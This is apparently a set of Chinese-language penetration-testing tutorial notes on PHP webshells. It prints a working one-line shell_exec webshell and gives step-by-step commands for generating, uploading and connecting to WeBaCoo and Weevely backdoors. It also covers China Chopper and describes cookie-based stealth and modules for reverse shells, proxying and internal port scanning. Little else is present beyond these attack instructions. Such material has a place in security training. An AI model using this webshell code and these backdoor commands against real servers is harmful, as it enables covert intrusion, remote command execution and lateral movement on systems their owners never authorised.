• 之前我们介绍过一句话的webshell

<?php echo shell_exec($_GET['cmd']);?>

• 中国菜刀

• 可能被IDS、AV、WAF、扫描器软件发现查杀

中国菜刀

• 下载好了之后，复制这个代码去服务器

• 之后运行客户端程序并添加服务器地址

• 然后双击就可以正常连接了

WeBaCoo(Web Backdoor Cookie)

• • 类终端的shell

  • 编码通信内容通过cookie头传输，隐蔽性较强

  • cm：base64编码的命令

  • cn：服务器用于返回数据

  • cp：返回信息定界符

生成服务端

webacoo -g -o a.php

客户端去连接，可以正常连接；

webacoo -t -u http://IP/a.php

• 当然他还有其他很多的命令，自己去试试把

Weevely

• 隐蔽的类终端PHP  Webshell

• 30多个管理模块

• • 执行系统命令、浏览文件系统

  • 检查服务器常见配置错误

  • 创建正向、反向TCP  SHELL连接

  • 通过目标计算机代理HTTP流量

  • 从目标计算机进行端口扫描，渗透内网

• 支持连接密码

首先需要安装一下库文件

• 首先访问这个网站https://pypi.python.org/pypi/PySocks/

• 之后解压出来，然后./setup.py install

• 生成服务端并传入至服务器中

weevely generate 123456 wee.php    （132456为连接密码）

• 之后可以连接了

weevely http://192.168.0.119/wee.php 123456 （123456就是设置的密码）

• 当然还有很多的可利用模块，大家可以试试